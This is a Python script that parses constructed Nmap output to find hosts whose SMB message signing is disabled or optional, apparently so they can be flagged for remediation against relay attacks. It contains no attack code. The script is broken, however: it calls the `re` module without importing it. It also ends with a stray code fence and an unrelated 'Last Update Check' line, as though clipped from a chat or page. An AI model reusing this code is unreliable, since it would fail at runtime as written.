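from typing import Dict, List

# Constructed Nmap output (not a real scan). some_host mirrors the question;
# the other hosts show the remaining signing states and a host with no result.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for fileserver.example.internal (10.0.0.5)
Host is up (0.0010s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for dc01.example.internal (10.0.0.10)
Host is up (0.0010s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Nmap scan report for some_host (10.0.0.23)
Host is up (0.01 latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing disabled

Nmap scan report for printer.example.internal (10.0.0.40)
Host is up (0.0020s latency).
PORT    STATE  SERVICE
445/tcp closed microsoft-ds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
SCRIPT_GUTTER_RE = re.compile(r"^\|_?\s*")            # strips the NSE "| " / "|_" gutter
SIGNING_RE = re.compile(r"^Message signing (.+?)\s*$")


def parse_smb_signing(nmap_output: str) -> Dict[str, str]:
    """Map each host with an smb2-security-mode result to its signing status text."""
    results: Dict[str, str] = {}
    host = None
    in_script = False
    for raw in nmap_output.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:                         # new host block: reset script state
            host, in_script = m.group(1), False
            continue
        line = SCRIPT_GUTTER_RE.sub("", line)
        if line.startswith("smb2-security-mode"):
            in_script = True          # status line follows (after the dialect line)
            continue
        m = SIGNING_RE.match(line)
        if in_script and host and m:
            results[host] = m.group(1)
            in_script = False
    return results


def signing_required(status: str) -> bool:
    """Only 'enabled and required' blocks relay; 'enabled but not required' does not."""
    return status == "enabled and required"


def hosts_not_requiring_signing(results: Dict[str, str]) -> List[str]:
    """Hosts to remediate: signing disabled or merely optional."""
    return sorted(h for h, s in results.items() if not signing_required(s))


if __name__ == "__main__":
    parsed = parse_smb_signing(SAMPLE_NMAP_OUTPUT)
    for h in hosts_not_requiring_signing(parsed):
        print(f"{h}: message signing {parsed[h]} -> require SMB signing")
```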

Last Update Check November 02, 2025